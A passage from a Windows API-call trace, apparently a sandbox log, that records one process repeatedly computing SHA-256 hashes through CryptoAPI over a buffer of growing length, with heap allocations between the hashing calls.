(HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e430 [0179.461] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6e430, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e430, pdwDataLen=0xcdf6c) returned 1 [0179.461] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.461] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.461] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0179.461] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.461] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0179.461] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6de00 [0179.461] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6de00, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6de00, pdwDataLen=0xcdf6c) returned 1 [0179.461] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.461] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0179.461] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.462] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.462] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0179.462] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.462] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e4c0 [0179.462] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e4c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e4c0, pdwDataLen=0xcdf6c) returned 1 [0179.462] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.462] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.462] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0179.462] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.462] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0179.462] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.463] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e130 [0179.463] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e130, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e130, pdwDataLen=0xcdf6c) returned 1 [0179.463] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.463] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0179.463] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.463] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.463] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0179.463] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.463] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6de30 [0179.464] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6de30, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6de30, pdwDataLen=0xcdf6c) returned 1 [0179.464] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.464] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.464] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.464] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.464] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0179.464] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.464] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e190 [0179.464] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e190, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e190, pdwDataLen=0xcdf6c) returned 1 [0179.464] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.464] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.464] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.465] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.465] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0179.465] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.465] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dbf0 [0179.465] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6dbf0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6dbf0, pdwDataLen=0xcdf6c) returned 1 [0179.465] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.465] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.465] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0179.466] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.466] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0179.466] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.466] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e100 [0179.466] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6e100, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e100, pdwDataLen=0xcdf6c) returned 1 [0179.466] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.466] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0179.466] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.466] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.466] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0179.466] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e6d0 [0179.467] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e6d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e6d0, pdwDataLen=0xcdf6c) returned 1 [0179.467] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.467] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.467] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.467] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.467] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0179.467] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e3d0 [0179.467] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e3d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e3d0, pdwDataLen=0xcdf6c) returned 1 [0179.467] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.467] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.467] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.470] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.470] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0179.470] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.470] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e310 [0179.470] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e310, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e310, pdwDataLen=0xcdf6c) returned 1 [0179.470] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.470] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.470] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.471] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.471] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0179.471] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dbc0 [0179.471] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6dbc0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6dbc0, pdwDataLen=0xcdf6c) returned 1 [0179.471] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.471] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.471] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0179.471] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.471] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0179.471] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e280 [0179.471] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e280, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e280, pdwDataLen=0xcdf6c) returned 1 [0179.472] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.472] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0179.472] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.472] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.472] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0179.472] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.472] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dd70 [0179.472] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6dd70, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6dd70, pdwDataLen=0xcdf6c) returned 1 [0179.472] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.472] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.472] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.473] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.473] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0179.473] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e610 [0179.473] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e610, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e610, pdwDataLen=0xcdf6c) returned 1 [0179.473] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.473] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.473] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0179.474] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.474] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0179.474] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e400 [0179.474] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e400, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e400, pdwDataLen=0xcdf6c) returned 1 [0179.474] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.474] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0179.474] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.474] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.475] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0179.475] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.475] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e010 [0179.475] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e010, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e010, pdwDataLen=0xcdf6c) returned 1 [0179.475] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.475] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.475] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.475] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.475] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0179.475] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.475] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e490 [0179.475] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e490, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e490, pdwDataLen=0xcdf6c) returned 1 [0179.475] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.475] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.475] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.476] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.476] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0179.476] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.476] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e070 [0179.476] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e070, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e070, pdwDataLen=0xcdf6c) returned 1 [0179.476] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.476] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.476] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.477] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.477] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0179.477] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.477] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e250 [0179.477] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6e250, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6e250, pdwDataLen=0xcdf6c) returned 1 [0179.477] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.477] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.477] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0179.478] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.478] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0179.478] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.478] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e340 [0179.478] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.478] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0179.478] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.479] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.479] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0179.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e370 [0179.479] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.479] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.479] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.479] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.479] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0179.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e460 [0179.479] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.479] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.479] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.480] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.480] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0179.480] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e160 [0179.480] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.480] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64aa0 | out: hHeap=0x2150000) returned 1 [0179.480] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e64aa0 [0179.480] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0179.481] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.481] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x20, dwFlags=0x0) returned 1 [0179.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e3a0 [0179.481] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.481] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0179.481] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0179.481] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.481] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x40, dwFlags=0x0) returned 1 [0179.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6df50 [0179.482] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.482] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0179.482] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.482] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.482] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x60, dwFlags=0x0) returned 1 [0179.482] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e1c0 [0179.482] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.482] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.482] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.483] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.483] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x80, dwFlags=0x0) returned 1 [0179.483] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dc20 